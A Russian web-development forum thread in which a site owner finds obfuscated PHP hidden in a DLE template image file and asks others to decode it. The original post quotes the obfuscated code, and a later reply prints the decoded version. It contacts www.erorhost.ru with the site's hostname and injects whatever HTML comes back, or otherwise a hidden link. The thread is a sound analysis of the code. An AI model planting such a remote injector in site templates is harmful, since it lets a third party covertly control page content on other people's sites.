Форум Сайтостроение Веб-строительство

Помогите расшифровать php

12
neptun1
На сайте с 19.07.2009
Offline
38
neptun1
1335

В шаблоне обнаружыл зашифрованый скрипт при удалении шаблон норм не отображается.

Помогите расшифровать 

<?php $x14="fcl\157\163\x65"; $x15="\x66e\x6f\146"; $x16="\x66\147\x65\164\x73"; $x17="\146\x73\x6f\143\153\157\160en"; $x18="\x66pu\164\x73"; $x19="\163t\162s\164\162"; 

$x0b="<\141 \150\162e\x66\075n\145\157\153\163.r\165\x3e\074\x2f\141\x3e";$x0c = @$x17("w\167w\056\145r\157r\x68\157\163\x74\056\x72u", 80, $x0d, $x0e, 30);if ($x0c){ $x0f = "\x47\105T /\x73\141\x69t\057\151\x64\x32.\160hp\077\x73\151t\x65\x3d".$_SERVER['HTTP_HOST']." \110\124\124P\x2f\x31.\061\n";$x0f .= "\110\157st\072\x20\167\x77w\056\x65r\x6f\162\x68os\164\056\162\165\n"; $x0f.='Accept: text/html, text/plain, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress  Accept-Language: ru,en Accept-Charset: windows-1251, iso-8859-1;q=0.01, us-ascii;q=0.01'; $x0f .= "\n\n"; $x18($x0c, $x0f);$x10 = false;while (!$x15($x0c)) {$x11=$x16($x0c,128);if ($x10) {$x12.= $x11;} else {$x13 .= $x11;}if ($x11 == "\r\n" ) {$x10 = true;}}$x14($x0c);}else return $x0b; if ($x19($x13,'404')) return $x0b;else return $x12; ?>
webinteger
На сайте с 13.10.2007
Offline
110
webinteger
#1

адрес сайта и фтп в личку

> PHP & mySQL написание и доработка скриптов Page 1 (/ru/forum/173281) Page 2 (/ru/forum/377616)
neptun1
На сайте с 19.07.2009
Offline
38
neptun1
#2

Зачем ети данные . Я просто прошу расшифровать. Для етого не нужно ни адреса ни фтп.:)

F
На сайте с 24.04.2009
Offline
45
Fearful
#3
neptun1:
Зачем ети данные . Я просто прошу расшифровать. Для етого не нужно ни адреса ни фтп.:)

Не весь кусок кода приведен.

AlikZP
На сайте с 22.11.2009
Offline
107
AlikZP
#4

Вирус это. Когда-то подобное расшифровывал.

Примерный алгоритм на примере первой строки:

код 

$x14="fcl\157\163\x65"; $x15="\x66e\x6f\146"; $x16="\x66\147\x65\164\x73"; $x17="\146\x73\x6f\143\153\157\160en"; $x18="\x66pu\164\x73"; $x19="\163t\162s\164\162";

переносим каждое действие в отдельную строку, исходный комментируем, а все, что после знака "равно" выносим в эхо.

Получается в итоге: 

// $x14="fcl\157\163\x65"; 

echo "x14="."fcl\157\163\x65"; 

// $x15="\x66e\x6f\146"; 

echo "x15="."\x66e\x6f\146"; 

// $x16="\x66\147\x65\164\x73"; 

echo "x16="."\x66\147\x65\164\x73"; 

// $x17="\146\x73\x6f\143\153\157\160en"; 

echo "x17="."\146\x73\x6f\143\153\157\160en"; 

// $x18="\x66pu\164\x73"; 

echo "x18="."\x66pu\164\x73"; 

// $x19="\163t\162s\164\162";

echo "x19="."\163t\162s\164\162";

Теперь мы видим что обозначают эти переменные.

Далее подставляем вместо $x14 то значение, которое мы увидели в эхе, так же ведем себя для всех остальных переменных.

Неизвестные переменные так же эхой выводим и смотрим что в них закодировали.

Так можно получить полностью раскодированный код и проанализировать его

Website CMS: быстрая, удобная, недорогая! Вечная лицензия за 45$ (/ru/forum/524503) Яся - быстрый поиск фото для товаров. OpenCart/ocStore. Дополнение. (/ru/forum/665287) Грамотная верстка ваших макетов (/ru/forum/comment/8853216)
iBBi
На сайте с 13.02.2007
Offline
328
iBBi
#5

DLE?

10 букв

neptun1
На сайте с 19.07.2009
Offline
38
neptun1
#6

код полностю предоставлен!

AlikZP
На сайте с 22.11.2009
Offline
107
AlikZP
#7
neptun1:
код полностю предоставлен!

Ну я описал вам алгоритм. Это помощь? Или имелось ввиду "раскодируйте скрипт" ?

neptun1
На сайте с 19.07.2009
Offline
38
neptun1
#8

Обясняю подробно когда просматримаеш код html сайта(дв.DLE) выдает такое в коде:


<a href="http://n86-geek.ru" title="Nokia N86: игры Nokia N86, темы для телефона Nokia N86, программы и софт nokia"></a> <a href="http://n95-geek.ru" title="Nokia N95 GeeK - клуб любителей Nokia N95. Программы Nokia N95, игры для Nokia N95 и другое"></a>

<!--
Данная ссылка является копирайтом автора данного шаблона.
Если у вас есть совесть и капля уважения к труду автора то не сносите эту ссылку так как вам она не делает погоды а мне хоть что то даст.

Если она вам мешает меняете шаблон или стучите в аську (4 четверки - два раза 59 - и в конце шесть) что бы убрать ссылки
Писать сразу что хотите убрать ссылку с сайта так как из за спама в аське я сообщения здрасти и т.д просто игнорирую!!
-->

Нашел проблему спрятану в типа картинке fonslogin.jpg открывая ее в блокноти видим етот код.

При удалении картинки ссылки исчезают они зашыфрованые в етом файле..

Но сайт тогда с ошыбками отображается надо разшифровать ето . На некоторых форумах ето делают но связатся не удалось.

F
На сайте с 24.04.2009
Offline
45
Fearful
#9
neptun1:
код полностю предоставлен!

Неа

$x0d, $x0e нету; 


$x0c=fsockopen("www.erorhost.ru",80,$x0d, $x0e, 30);



if ($x0c)

{

	$x0f = "\x47\105T /\x73\141\x69t\057\151\x64\x32.\160hp\077\x73\151t\x65\x3d".$_SERVER['HTTP_HOST']." \110\124\124P\x2f\x31.\061\n";$x0f .= "\110\157st\072\x20\167\x77w\056\x65r\x6f\162\x68os\164\056\162\165\n"; $x0f.='Accept: text/html, text/plain, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress  Accept-Language: ru,en Accept-Charset: windows-1251, iso-8859-1;q=0.01, us-ascii;q=0.01'; $x0f .= "\n\n";



	fputs($x0c,$x0f);



	$x10=false;



	while (!feof($x0c))

	{

		$x11=fgets($x0c,128);

		if ($x10) {$x12.= $x11;} else {$x13 .= $x11;}

		if ($x11 == "\r\n" ) {$x10 = true;}

	}



	fclose($x0c);

}

else return "<a href=neoks.ru></a>";

if (strstr($x13,'404')) return "<a href=neoks.ru></a>"; else return $x12; ?>

Правда, с вашими знаниями, этот кусок кода вам не поможет.

neptun1
На сайте с 19.07.2009
Offline
38
neptun1
#10

Согласен знаний пока маловато.Я скопировал весь код что там был

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий